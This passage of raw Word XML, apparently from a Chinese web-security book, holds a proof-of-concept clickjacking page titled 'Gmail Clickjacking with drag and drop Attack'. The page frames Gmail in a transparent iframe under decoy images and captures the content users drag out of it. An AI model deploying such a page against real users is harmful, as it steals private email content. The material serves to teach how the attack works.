        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="even" r:id="rId57"/>
          <w:headerReference w:type="default" r:id="rId58"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="132"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="90"/>
        <w:ind w:left="841" w:right="5146" w:hanging="161"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:73.679939pt;width:411.15pt;height:600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-69184" coordorigin="254,1474" coordsize="8223,12000" path="m8477,12874l254,12874,254,13073,254,13274,254,13474,8477,13474,8477,13274,8477,13073,8477,12874m8477,12274l254,12274,254,12473,254,12674,254,12874,8477,12874,8477,12674,8477,12473,8477,12274m8477,9274l254,9274,254,9473,254,9674,254,9874,254,10073,254,10274,254,10474,254,10673,254,10874,254,11074,254,11273,254,11474,254,11674,254,11873,254,12074,254,12274,8477,12274,8477,12074,8477,11873,8477,11674,8477,11474,8477,11273,8477,11074,8477,10874,8477,10673,8477,10474,8477,10274,8477,10073,8477,9874,8477,9674,8477,9473,8477,9274m8477,8674l254,8674,254,8873,254,9074,254,9274,8477,9274,8477,9074,8477,8873,8477,8674m8477,8074l254,8074,254,8273,254,8474,254,8674,8477,8674,8477,8474,8477,8273,8477,8074m8477,7474l254,7474,254,7673,254,7874,254,8074,8477,8074,8477,7874,8477,7673,8477,7474m8477,6874l254,6874,254,7073,254,7274,254,7474,8477,7474,8477,7274,8477,7073,8477,6874m8477,6274l254,6274,254,6473,254,6674,254,6874,8477,6874,8477,6674,8477,6473,8477,6274m8477,5674l254,5674,254,5873,254,6074,254,6274,8477,6274,8477,6074,8477,5873,8477,5674m8477,5074l254,5074,254,5273,254,5474,254,5674,8477,5674,8477,5474,8477,5273,8477,5074m8477,1474l254,1474,254,1673,254,1874,254,2074,254,2273,254,2474,254,2674,254,2873,254,3074,254,3274,254,3473,254,3674,254,3874,254,4073,254,4274,254,4474,254,4673,254,4874,254,5074,8477,5074,8477,4874,8477,4673,8477,4474,8477,4274,8477,4073,8477,3874,8477,3674,8477,3473,8477,3274,8477,3074,8477,2873,8477,2674,8477,2474,8477,2273,8477,2074,8477,1874,8477,1673,8477,1474e" filled="true" fillcolor="#dadada" stroked="false">
            <v:path arrowok="t"/>
            <v:fill type="solid"/>
            <w10:wrap type="none"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function DumpInfo(event) { showHide_ball.call(this); showHide_ball_1.call(this);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var info = document.getElementById("info");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="203" w:right="1497" w:firstLine="638"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>info.innerHTML += "&lt;span style='color:#3355cc;font-size:13px'&gt;" + event.dataTransfer.getData('Text') + "&lt;/span&gt;&lt;br&gt; ";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function showHide_frame() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="841" w:right="2842" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var iframe_1 = document.getElementById("iframe_1"); iframe_1.style.opacity = this.checked ? "0.5": "0";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="441" w:firstLine="638"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>iframe_1.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + (this.checked ? "50": "0") + ");"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="17"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function showHide_text() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="841" w:right="3034" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var text_1 = document.getElementById("target"); text_1.style.opacity = this.checked ? "0.5": "0";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="633" w:firstLine="638"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text_1.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + (this.checked ? "50": "0") + ");"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="17"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function showHide_ball() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="841" w:right="2657" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var hide_ball = document.getElementById("hide_ball"); hide_ball.style.opacity =  "0"; hide_ball.style.filter =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"alpha(opacity=0)";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function showHide_ball_1() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="841" w:right="2273" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var hide_ball_1 = document.getElementById("hide_ball_1"); hide_ball_1.style.opacity =  "1"; hide_ball_1.style.filter =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"alpha(opacity=100)";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
        <w:ind w:left="841" w:right="3418" w:hanging="161"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function reload_text() { document.getElementById("target").value = '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="7131" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="100"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="0" w:right="7194" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="0" w:right="5658" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;body onload="Init();"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="0" w:right="6843" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21"/>
        <w:ind w:left="0" w:right="2679" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Gmail Clickjacking with drag and drop Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="17"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;img id="hide_ball" src=ball.png class="ball"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;div id="source"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
        <w:ind w:left="203" w:right="1466" w:firstLine="477"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;iframe id="iframe_1" src="https://mail.google.com/mail/ig/mailmax" class="iframe_hidden"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>scrolling="no"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;img src=Dolphin.jpg class="Dolphin"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;img id="hide_ball_1" src=ball.png class="ball_1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;textarea id="target" class="text_area_hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="203" w:right="0" w:firstLine="316"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;div id="info"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>style="position:absolute;background-color:#e0e0e0;font-weight:bold; top:600px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="5.5  ClickJacking 3.0：触屏劫持" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:411.15pt;height:360pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="506" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Note: Clicking "ctrl + a" to select the ball, then drag it to the</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
